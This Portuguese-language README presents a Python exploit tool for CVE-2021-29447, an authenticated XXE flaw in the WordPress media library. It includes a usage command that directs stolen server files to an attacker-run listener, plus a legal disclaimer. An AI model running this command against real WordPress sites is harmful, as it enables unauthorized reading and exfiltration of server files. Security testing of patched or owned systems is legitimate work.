
Explorar injeção de entidade externa XML (XXE) na biblioteca de mídia do WordPress para exfiltrar arquivos.
Explora a injeção de entidade externa (XXE) autenticada na biblioteca de mídia do WordPress para exfiltrar arquivos.
Corrigido no WordPress 5.7.1.
Requer credenciais válidas do WordPress para interagir com a Biblioteca de Mídia.
python3 wordpress-cve-2021-29447.py -l http://LOCAL_IP:PORT -r http://WORDPRESS_URL -u USERNAME -p PASSWORD
O script solicitará o caminho do arquivo e retornará o arquivo solicitado.
Inspirado no script de David Utón (M3n0sD0n4ld) ExploitDB.
O uso deste script para atacar alvos sem consentimento mútuo prévio é ilegal. É de responsabilidade do usuário final obedecer a todas as leis locais, estaduais e federais aplicáveis. Os desenvolvedores não assumem nenhuma responsabilidade e não se responsabilizam por qualquer uso indevido ou dano causado por este programa. Use apenas para fins educacionais.
Este script é lançado sob a Licença MIT.